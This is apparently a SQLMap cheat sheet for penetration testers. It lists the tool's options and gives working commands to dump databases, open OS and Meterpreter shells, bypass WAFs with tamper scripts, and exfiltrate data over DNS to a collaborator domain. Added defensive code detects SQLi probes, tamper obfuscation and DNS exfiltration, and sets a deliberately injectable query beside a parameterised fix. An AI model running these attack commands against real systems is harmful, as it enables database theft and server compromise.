What is SQLMap?

SQLMap is a SQL injection automation tool that finds and exploits SQL injection vulnerabilities. SQLMap provides a wide range of functionality, from fingerprinting the back-end DBMS to fully compromising a database and, in some cases, gaining shell-level access to the underlying server. If you do not yet understand the fundamentals of how a SQL injection vulnerability occurs or is exploited, see our documentation on what is SQL injection for an overview.

TIP: How To Use SQLMap

I personally use SQLMap as an exploitation tool; due to the large amount of resources and traffic the tool uses, I personally find that detection is better done manually or using other detection tools such as the Burp Suite scanner.

How to use SQLMap

SQLMap can be used within an automation system to detect and exploit SQL injection (SQLi) vulnerabilities in web applications, or as a SQLi exploitation tool once a proof-of-concept SQLi payload has been confirmed.


Depending on the configuration, SQLMap can be very heavy on the number of requests sent to a web application; it may cause DoS conditions on the web server and generate an excessive volume of log entries on the target.

The more information you give SQLMap, the faster it runs and the fewer requests it makes. For example, if you already know the back-end DBMS is MySQL and that it is vulnerable to time-based injection, pass that to SQLMap using --dbms=mysql and --technique=T.
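Because a SQLMap run is noisy by design, the request volume described above is also what a defender can look for. The following is an added example (not part of the original cheat sheet) of a small log analyser that runs over constructed Apache combined-format access-log lines and scores each client on three signals: the default "sqlmap/..." User-Agent (absent when --random-agent is used), URL-decoded query strings that carry boolean-, time- or UNION-based probe patterns, and a burst of requests accompanied by HTTP 5xx responses. The IP addresses, timestamps and User-Agent strings are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log sample (not real traffic): 10.0.0.5 and
# 10.0.0.7 are ordinary visitors, 10.0.0.9 behaves like an automated SQLi scanner.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2024:10:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Feb/2024:10:00:01 +0000] "GET /search.php?q=rock+and+roll HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2024:10:00:02 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [12/Feb/2024:10:00:02 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [12/Feb/2024:10:00:02 +0000] "GET /vuln.php?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [12/Feb/2024:10:00:03 +0000] "GET /vuln.php?id=1%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2024:10:00:08 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL--%20 HTTP/1.1" 500 128 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2024:10:00:09 +0000] "GET /vuln.php?id=1%27 HTTP/1.1" 500 128 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Feb/2024:10:00:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Patterns typical of boolean-, time- and UNION-based probes, matched after URL decoding.
SQLI_RE = re.compile(
    r"(\bunion\b.{0,40}\bselect\b"                          # UNION-based
    r"|\bsleep\s*\(|\bbenchmark\s*\(|\bwaitfor\s+delay\b"   # time-based
    r"|\b(and|or)\b\s+\S+\s*=\s*\S+"                        # boolean-based (1 AND 1=1)
    r"|'\s*(and|or)\b|--\s|/\*.*?\*/)",                     # quote breakout, comment suffix
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])  # decode %xx and '+' before matching
    return rec


def analyse(log_text, rate_threshold=5):
    """Return {ip: stats} for every client that shows at least one scanner signal."""
    per_ip = defaultdict(lambda: {"requests": 0, "sqli_hits": 0, "sqlmap_ua": 0, "errors": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["requests"] += 1
        if "sqlmap" in rec["ua"].lower():
            s["sqlmap_ua"] += 1  # default UA; not present when --random-agent is used
        if SQLI_RE.search(rec["decoded"]):
            s["sqli_hits"] += 1
        if rec["status"].startswith("5"):
            s["errors"] += 1  # broken queries often surface as HTTP 500s

    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["sqlmap_ua"]:
            reasons.append("default sqlmap User-Agent seen")
        if s["sqli_hits"] >= 2:
            reasons.append(f"{s['sqli_hits']} requests carry SQL injection patterns")
        if s["requests"] >= rate_threshold and s["errors"] >= 2:
            reasons.append(f"{s['requests']} requests with {s['errors']} server errors")
        if reasons:
            findings[ip] = dict(s, reasons=reasons)
    return findings


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(info["reasons"]))
```

In the sample only 10.0.0.9 is reported, with all three reasons; the "rock and roll" search by 10.0.0.7 shows why the boolean pattern requires an equality after the keyword. A real deployment would window the request count by time rather than counting over the whole file, and would not rely on the User-Agent alone, since --random-agent removes that signal entirely.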

How to Install SQLMap

Install SQLMap via github:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

How to Update SQLMap

How to update SQLMap:

python sqlmap.py --update 

or cd into the cloned GitHub repository directory and run:

git pull 

SQLMap Commands

SQLMap Options

Basic SQLMap command options:


-h, --help

Show basic help message and exit


Show advanced help message and exit


Show program's version number and exit


Verbosity level: 0-6 (default 1)

SQLMap Target

SQLMap target command options:


-u URL, --url=URL

Target URL (e.g. "http://www.site.com/vuln.php?id=1")


Connection string for direct database connection


Parse target(s) from Burp or WebScarab proxy log file


Scan multiple targets given in a textual file


Load HTTP request from a file


Process Google dork results as target URLs


Load options from a configuration INI file

SQLMap Requests

SQLMap request command options:


-A AGENT, --user..

HTTP User-Agent header value

-H HEADER, --hea..

Extra header (e.g. "X-Forwarded-For:")


Force usage of given HTTP method (e.g. PUT)


Data string to be sent through POST (e.g. "id=1")


Character used for splitting parameter values (e.g. &)


HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")


Character used for splitting cookie values (e.g. ;)


Live cookies file used for loading up-to-date values


File containing cookies in Netscape/wget format


Ignore Set-Cookie header from response


Imitate smartphone through HTTP User-Agent header


Use randomly selected HTTP User-Agent header value


HTTP Host header value


HTTP Referer header value


Extra headers (e.g. "Accept-Language: fr\nETag: 123")


HTTP authentication type (Basic, Digest, NTLM or PKI)


HTTP authentication credentials (name:password)


HTTP authentication PEM cert/private key file


Ignore (problematic) HTTP error code (e.g. 401)


Ignore system default proxy settings


Ignore redirection attempts


Ignore connection timeouts


Use a proxy to connect to the target URL


Proxy authentication credentials (name:password)


Load proxy list from a file


Requests between change of proxy from a given list


Use Tor anonymity network


Set Tor proxy port other than default


Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))


Check to see if Tor is used properly


Delay in seconds between each HTTP request


Seconds to wait before the connection times out (default 30)


Retries when the connection times out (default 3)


Randomly change value for given parameter(s)


URL address to visit frequently during testing


POST data to send to a safe URL


Load safe HTTP request from a file


Regular requests between visits to a safe URL


Skip URL encoding of payload data


Parameter used to hold anti-CSRF token


URL address to visit for extraction of anti-CSRF token


HTTP method to use during anti-CSRF token page visit


Retries for anti-CSRF token retrieval (default 0)


Force usage of SSL/HTTPS


Use HTTP chunked transfer encoded (POST) requests


Use HTTP parameter pollution method


Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

SQLMap Optimisation

SQLMap optimisation command options:



Turn on all optimization switches


Predict common queries output


Use persistent HTTP(s) connections


Retrieve page length without actual HTTP response body


Max number of concurrent HTTP(s) requests (default 1)

SQLMap Injection

SQLMap injection command options:



Testable parameter(s)


Skip testing for given parameter(s)


Skip testing parameters that do not appear to be dynamic


Regexp to exclude parameters from testing (e.g. "ses")


Select testable parameter(s) by place (e.g. "POST")


Force back-end DBMS to provided value


DBMS authentication credentials (user:password)


Force back-end DBMS operating system to provided value


Use big numbers for invalidating values


Use logical operations for invalidating values


Use random strings for invalidating values


Turn off payload casting mechanism


Turn off string escaping mechanism


Injection payload prefix string


Injection payload suffix string


Use given script(s) for tampering injection data

SQLMap Detection

SQLMap detection command options:



Level of tests to perform (1-5, default 1)


Risk of tests to perform (1-3, default 1)


String to match when query is evaluated to True


String to match when query is evaluated to False


Regexp to match when query is evaluated to True


HTTP code to match when query is evaluated to True


Perform thorough tests only if positive heuristic(s)


Compare pages based only on the textual content


Compare pages based only on their titles

SQLMap Techniques

SQLMap technique command options:



SQL injection techniques to use (default "BEUSTQ")


Seconds to delay the DBMS response (default 5)


Range of columns to test for UNION query SQL injection


Character to use for bruteforcing number of columns


Table to use in FROM part of UNION query SQL injection


Domain name used for DNS exfiltration attack


Resulting page URL searched for second-order response


Load second-order HTTP request from file

SQLMap Fingerprinting

SQLMap fingerprint command options:


-f, --fingerprint

Perform an extensive DBMS version fingerprint

SQLMap Enumeration

SQLMap enumeration command options:


-a, --all

Retrieve everything

-b, --banner

Retrieve DBMS banner


Retrieve DBMS current user


Retrieve DBMS current database


Retrieve DBMS server hostname


Detect if the DBMS current user is DBA


Enumerate DBMS users


Enumerate DBMS users password hashes


Enumerate DBMS users privileges


Enumerate DBMS users roles


Enumerate DBMS databases


Enumerate DBMS database tables


Enumerate DBMS database table columns


Enumerate DBMS schema


Retrieve number of entries for table(s)


Dump DBMS database table entries


Dump all DBMS databases tables entries


Search column(s), table(s) and/or database name(s)


Check for DBMS comments during enumeration


Retrieve SQL statements being run on DBMS


DBMS database to enumerate


DBMS database table(s) to enumerate


DBMS database table column(s) to enumerate


DBMS database identifier(s) to not enumerate


DBMS user to enumerate


Exclude DBMS system databases when enumerating tables


Pivot column name


Use WHERE condition while table dumping


First dump table entry to retrieve


Last dump table entry to retrieve


First query output word character to retrieve


Last query output word character to retrieve


SQL statement to be executed


Prompt for an interactive SQL shell


Execute SQL statements from given file(s)

SQLMap Brute Force

SQLMap brute force command options:



Check existence of common tables


Check existence of common columns


Check existence of common files

SQLMap Custom User Defined Options

SQLMap custom command options:



Inject custom user-defined functions


Local path of the shared library

SQLMap File System Options

SQLMap file system command options, e.g., how to read a file from the command line using SQLMap:



Read a file from the back-end DBMS file system


Write a local file on the back-end DBMS file system


Back-end DBMS absolute filepath to write to

SQLMap Operating System Access

SQLMap OS command options, e.g., how to gain a shell via SQLMap:



Execute an operating system command


Prompt for an interactive operating system shell


Prompt for an OOB shell, Meterpreter or VNC


One click prompt for an OOB shell, Meterpreter or VNC


Stored procedure buffer overflow exploitation


Database process user privilege escalation


Local path where Metasploit Framework is installed


Remote absolute path of temporary files directory

SQLMap Windows Registry Access



Read a Windows registry key value


Write a Windows registry key value data


Delete a Windows registry key value


Windows registry key


Windows registry key value


Windows registry key value data


Windows registry key value type

General SQLMap Commands

SQLMap general command options:



Load session from a stored (.sqlite) file


Log all HTTP traffic into a textual file


Set predefined answers (e.g. "quit=N,follow=N")


Parameter(s) containing Base64 encoded data


Use URL and filename safe Base64 alphabet (RFC 4648)


Never ask for user input, use the default behavior


Result fields having binary values (e.g. "digest")


Check Internet connection before assessing the target


Clean up the DBMS from sqlmap specific UDF and tables


Crawl the website starting from the target URL


Regexp to exclude pages from crawling (e.g. "logout")


Delimiting character used in CSV output (default ",")


Blind SQL injection charset (e.g. "0123456789abcdef")


Format of dumped data (CSV (default), HTML or SQLITE)


Character encoding used for data retrieval (e.g. GBK)


Display for each output the estimated time of arrival


Flush session files for current target


Parse and test forms on target URL


Ignore query results stored in session file


Use Google dork results from specified page number


Log all HTTP traffic into a HAR file


Use hex conversion during data retrieval


Custom output directory path


Parse and display DBMS error messages from responses


Use given script(s) for preprocessing (request)


Use given script(s) for postprocessing (response)


Redump entries having unknown character marker (?)


Save options to a configuration INI file


Regexp for filtering targets


Skip heuristic detection of SQLi/XSS vulnerabilities


Skip heuristic detection of WAF/IPS protection


Prefix used for temporary tables (default: "sqlmap")


Select tests by payloads and/or titles (e.g. ROW)


Skip tests by payloads and/or titles (e.g. BENCHMARK)


Web server document root directory (e.g. "/var/www")

Misc SQLMap Commands

SQLMap commands that don’t fit into any other category :)



Use short mnemonics (e.g. "flu,bat,ban,tec=EU")


Run host OS command(s) when SQL injection is found


Beep on question and/or when SQLi/XSS/FI is found


Check for missing (optional) sqlmap dependencies


Disable console output coloring


Display list of available tamper scripts


Work in offline mode (only use session data)


Safely remove all content from sqlmap data directory


Location of CSV results file in multiple targets mode


Prompt for an interactive sqlmap shell


Local directory for storing temporary files


Adjust options for unstable connections


Update sqlmap


Simple wizard interface for beginner users

SQLMap Examples: How To…

Enumerate Databases

How to enumerate the databases using SQLMap:

sqlmap -u "https://highon.coffee" --dbs 

Enumerate Tables

How to enumerate the database tables using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" --tables 

SQLMap Dump DB Table

How to dump the contents of the table using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" -T "$table-name" --dump 

SQLMap from Burp file

Save a Burp or ZAP request file and mark the injection point parameter(s) with an asterisk (*). The good thing about this option is that it takes care of any authentication cookies for you. You can inject into any parameter in the request, e.g. headers, inside cookies, and using multiple methods (GET, PUT, POST, DELETE, etc.).

sqlmap -r request.burp 

Custom SQL Injection Payload: Pre and Post Input

In a scenario where you have identified a SQL injection manually or via another tool, you may need to prefix the payload (have input inserted before the SQL injection payload) or suffix it (have input inserted after the injection payload). This can be accomplished using the following:

How to insert input before an injection payload:

sqlmap -u "https://highon.coffee" --dbs --prefix="blah"

How to insert input after an injection payload:

sqlmap -u "https://highon.coffee" --dbs --suffix="--+"
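Why the prefix and suffix have to fit the injection context is easiest to see against a concrete query. The following is an added example (not from the cheat sheet or from sqlmap) using an in-memory SQLite database: a deliberately vulnerable lookup splices the user value into a quoted string that is followed by more SQL, so a payload needs a quote as prefix and a comment as suffix before the query even parses; the parameterised version beside it is the mitigation. The table, rows and the helper names are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, active INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", 1), (2, "bob", 0), (3, "carol", 1)],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Deliberately vulnerable: the value lands inside a quoted string literal that is
    followed by more SQL, so a payload must close the quote first (prefix) and
    neutralise the trailing clause afterwards (suffix)."""
    sql = f"SELECT id, name FROM users WHERE name = '{name}' AND active = 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened form: a bound parameter is never parsed as SQL, whatever it contains."""
    sql = "SELECT id, name FROM users WHERE name = ? AND active = 1"
    return conn.execute(sql, (name,)).fetchall()


def try_payload(conn, prefix, body, suffix):
    """Assemble prefix + body + suffix the way --prefix/--suffix wrap a payload and
    report whether the resulting query ran ("ok", rows) or broke ("error", message)."""
    try:
        return "ok", lookup_vulnerable(conn, prefix + body + suffix)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = build_db()
    print(try_payload(db, "", " OR 1=1", ""))       # stays a harmless string: ("ok", [])
    print(try_payload(db, "'", " OR 1=1", ""))      # quote closed, clause dangles: error
    print(try_payload(db, "'", " OR 1=1", " -- "))  # prefix and suffix fit: every active row
    print(lookup_safe(db, "' OR 1=1 -- "))          # parameterised query returns []
```

Without the closing-quote prefix the payload is just a name nobody has; with the prefix but no comment suffix the leftover `' AND active = 1` is an unterminated string and the DBMS rejects the statement. Only the combination that matches the surrounding SQL produces a useful query, which is exactly the information you hand SQLMap with --prefix and --suffix. The parameterised lookup returns nothing for the same input regardless of wrapping.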

SQLMap Shell

How to get an operating system command shell with SQLMap:


How to execute a command with SQLMap:

--os-cmd uname 

Meterpreter Shell with SQLMap:


SQLMap WAF Bypass

To bypass WAFs with SQLMap you can use the pre-made tamper scripts with --tamper, as in the following example:

sqlmap -u "https://highon.coffee/?espresso=*" --tamper="apostrophemask,apostrophenullencode,randomcase"

Tamper Scripts Send a LOT of Requests

Tamper scripts will resend the same request for each of the SQLMap WAF bypass scripts that you add.

List of SQLMap Tamper Scripts:

apostrophemask.py - Replaces the apostrophe character with its UTF-8 full-width counterpart
apostrophenullencode.py - Replaces the apostrophe character with its illegal double-unicode counterpart
appendnullbyte.py - Appends an encoded NULL byte character at the end of the payload
base64encode.py - Base64-encodes all characters in a given payload
between.py - Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #'
bluecoat.py - Replaces the space character after a SQL statement with a valid random blank character. Afterwards replaces the character '=' with the LIKE operator
chardoubleencode.py - Double URL-encodes all characters in a given payload (not processing already encoded)
commalesslimit.py - Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
commalessmid.py - Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
concat2concatws.py - Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py - URL-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.py - Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded)
equaltolike.py - Replaces all occurrences of the equals operator ('=') with the operator 'LIKE'
escapequotes.py - Slash-escapes quotes (' and ")
greatest.py - Replaces the greater-than operator ('>') with its 'GREATEST' counterpart
halfversionedmorekeywords.py - Adds a versioned MySQL comment before each keyword
ifnull2ifisnull.py - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
modsecurityversioned.py - Embraces the complete query with a versioned comment
modsecurityzeroversioned.py - Embraces the complete query with a zero-versioned comment
multiplespaces.py - Adds multiple spaces around SQL keywords
nonrecursivereplacement.py - Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. .replace("SELECT", ""))
percentage.py - Adds a percentage sign ('%') in front of each character
overlongutf8.py - Converts all characters in a given payload to their overlong UTF-8 form (not processing already encoded)
randomcase.py - Replaces each keyword character with a random-case value
randomcomments.py - Adds random comments to SQL keywords
securesphere.py - Appends a specially crafted string
sp_password.py - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py - Replaces the space character (' ') with comments
space2dash.py - Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.py - Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.py - Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.py - Replaces the space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.py - Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.py - Replaces the space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.py - Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.py - Replaces the space character (' ') with a plus ('+')
space2randomblank.py - Replaces the space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.py - Replaces the AND and OR logical operators with their symbolic counterparts (&& and ||)
unionalltounion.py - Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py - Replaces the quote character (') with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
uppercase.py - Replaces each keyword character with its upper-case value (e.g. 'INSERT')
varnish.py - Appends an HTTP header 'X-originating-IP'
versionedkeywords.py - Encloses each non-function keyword with a versioned MySQL comment
versionedmorekeywords.py - Encloses each keyword with a versioned MySQL comment
xforwardedfor.py - Appends a fake HTTP header 'X-Forwarded-For'
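The list above also explains what a WAF or detection rule is up against: most tamper scripts only re-encode, re-case or pad the same SQL, so a signature that matches the raw request breaks while one that matches after normalisation survives. The following is an added example (written for this page, not sqlmap's own tamper code) that approximates three of the listed transformations (space2comment, randomcase with a deterministic alternating case so the run is reproducible, and charencode), then shows a naive case-sensitive signature failing on the obfuscated payload while a normaliser that URL-decodes, strips inline comments, collapses whitespace and lower-cases catches it. Payload text and function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Approximations of three listed tamper transformations, written for this demonstration
# (these are not sqlmap's scripts): space2comment, randomcase and charencode.
def space2comment(payload):
    return payload.replace(" ", "/**/")


def randomcase(payload):
    # deterministic alternating case instead of random, so the example is reproducible
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))


def charencode(payload):
    return "".join(f"%{ord(c):02X}" for c in payload)


COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
NAIVE_RE = re.compile(r"UNION\s+(ALL\s+)?SELECT")      # case-sensitive, raw request only
CANON_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b")  # applied after normalize()


def normalize(payload, max_decode=3):
    """Undo the layers the tamper scripts add: repeated URL-decoding, inline comments,
    irregular whitespace and letter case, so one canonical signature can be applied."""
    s = payload
    for _ in range(max_decode):          # bounded, so double-encoding cannot loop forever
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = COMMENT_RE.sub(" ", s)           # /**/ and similar become plain separators
    s = re.sub(r"\s+", " ", s)           # collapse tabs, newlines, multiple spaces
    return s.strip().lower()


def naive_match(payload):
    return NAIVE_RE.search(payload) is not None


def robust_match(payload):
    return CANON_RE.search(normalize(payload)) is not None


ORIGINAL = "1 UNION ALL SELECT NULL,NULL"
OBFUSCATED = charencode(randomcase(space2comment(ORIGINAL)))

if __name__ == "__main__":
    print("obfuscated :", OBFUSCATED)
    print("normalised :", normalize(OBFUSCATED))
    print("naive match:", naive_match(ORIGINAL), naive_match(OBFUSCATED))
    print("robust     :", robust_match(ORIGINAL), robust_match(OBFUSCATED))
```

The normaliser is deliberately generic: it does not need to know which tamper scripts were chained, only which classes of transformation (encoding, comments, whitespace, case) are reversible. Scripts that change the SQL itself, such as equaltolike.py or between.py, need a signature per rewrite rather than more decoding.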

SQLMap Proxy

It is possible to proxy SQLMap traffic via an upstream proxy such as Burp Suite by passing the following syntax to the tool:

sqlmap --proxy= 

Burp Proxy Performance Hit

In my experience using Burp Suite as a Proxy for this process results in a considerable slow down in performance.

SQLMap Blind SQLi Out of Band (OOB)

sqlmap -u "https://highon.coffee/?espresso=*" --dns-domain=$your-collab-url
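DNS exfiltration of this kind is visible to the target's own resolver logs, since every chunk of data becomes a query for a long, high-entropy label under one zone. The following is an added example (not part of the cheat sheet) that runs over a constructed DNS query log, groups queries by registered domain and flags a zone that receives several unique, long, high-entropy subdomain labels. The log format, client addresses and the "collab.invalid" zone are constructed for the example; the hex labels are made-up data and do not reproduce sqlmap's actual encoding.

```python
import math
from collections import defaultdict

# Constructed DNS query log ("timestamp client qtype qname"), not real data. The
# collab.invalid zone stands in for an attacker-controlled collaborator domain.
SAMPLE_DNS = """\
2024-02-12T10:00:01Z 10.0.0.5 A www.example.com
2024-02-12T10:00:01Z 10.0.0.5 A cdn.example.com
2024-02-12T10:00:02Z 10.0.0.7 A mail.example.com
2024-02-12T10:00:02Z 10.0.0.9 A 7468652d717569636b.collab.invalid
2024-02-12T10:00:02Z 10.0.0.9 A 62726f776e2d666f78.collab.invalid
2024-02-12T10:00:03Z 10.0.0.9 A 6a756d70732d6f766572.collab.invalid
2024-02-12T10:00:03Z 10.0.0.9 A 6c617a792d646f67.collab.invalid
2024-02-12T10:00:04Z 10.0.0.5 A www.example.com
"""


def shannon_entropy(text):
    """Bits of entropy per character; encoded data scores higher than hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (registered_domain, subdomain_labels). The registered domain is taken
    as the last two labels, which is crude: production code should use the public
    suffix list so that names like example.co.uk are grouped correctly."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def analyse_dns(log_text, min_unique=3, min_label_len=12, min_entropy=2.5):
    """Return {registered_domain: stats}, with a "suspicious" flag for zones whose
    subdomain labels look like encoded data rather than hostnames."""
    per_domain = defaultdict(lambda: {"queries": 0, "labels": set(), "clients": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        _ts, client, _qtype, qname = parts
        domain, sub_labels = split_name(qname)
        st = per_domain[domain]
        st["queries"] += 1
        st["clients"].add(client)
        st["labels"].update(sub_labels)

    result = {}
    for domain, st in per_domain.items():
        labels = sorted(st["labels"])
        mean_len = sum(map(len, labels)) / len(labels) if labels else 0.0
        mean_ent = sum(map(shannon_entropy, labels)) / len(labels) if labels else 0.0
        result[domain] = {
            "queries": st["queries"],
            "clients": sorted(st["clients"]),
            "unique_labels": len(labels),
            "mean_label_len": round(mean_len, 1),
            "mean_entropy": round(mean_ent, 2),
            "suspicious": (len(labels) >= min_unique
                           and mean_len >= min_label_len
                           and mean_ent >= min_entropy),
        }
    return result


if __name__ == "__main__":
    for domain, info in analyse_dns(SAMPLE_DNS).items():
        flag = "SUSPICIOUS" if info["suspicious"] else "ok"
        print(f"{domain:20} {flag:10} labels={info['unique_labels']} "
              f"len={info['mean_label_len']} H={info['mean_entropy']} clients={info['clients']}")
```

In the sample, example.com is queried more often but its labels are short, ordinary hostnames, while collab.invalid receives four distinct labels averaging eighteen characters and nearly three bits of entropy per character from a single client. Thresholds like these need tuning against real traffic, because CDNs and some telemetry services also use long, hash-like subdomain labels.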

SQLMap GET Parameter

The following specifies the GET parameter "espresso" for injection:

sqlmap -u "https://highon.coffee/?espresso=*" -p espresso

SQLMap POST Parameter

The following specifies the POST parameter "espresso" for injection:

sqlmap -u "https://highon.coffee/?espresso=*" --data "espresso=*"

Run SQL Queries

You can run a SQL query using --sql-query, for example:

sqlmap -u highon.coffee -D $database-name --sql-query="SELECT * FROM $table;"

URL Parameters in Friendly URLs

Simply mark them with an asterisk (*), for example:


The above would set the injection point at parameter1.

SQLMap Crawl & Exploit

Useful for automation, however please be mindful of the overheads you are imposing on the target server:

python3 sqlmap.py --crawl=5 --threads=5 --risk=3 --level=5 --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N" --crawl-exclude="logout" --forms --tamper=apostrophemask,apostrophenullencode,randomcase --dns-domain=$your-collab-url --random-agent -u https://highon.coffee

You will need to replace your collaborator payload URL, and I highly recommend you set up your own collaborator server for this.


Document Changelog

  • Last Updated: 12/02/2024 (12th of February 2024)
  • Author: Arr0way
  • Notes: SQLMap cheat sheet created.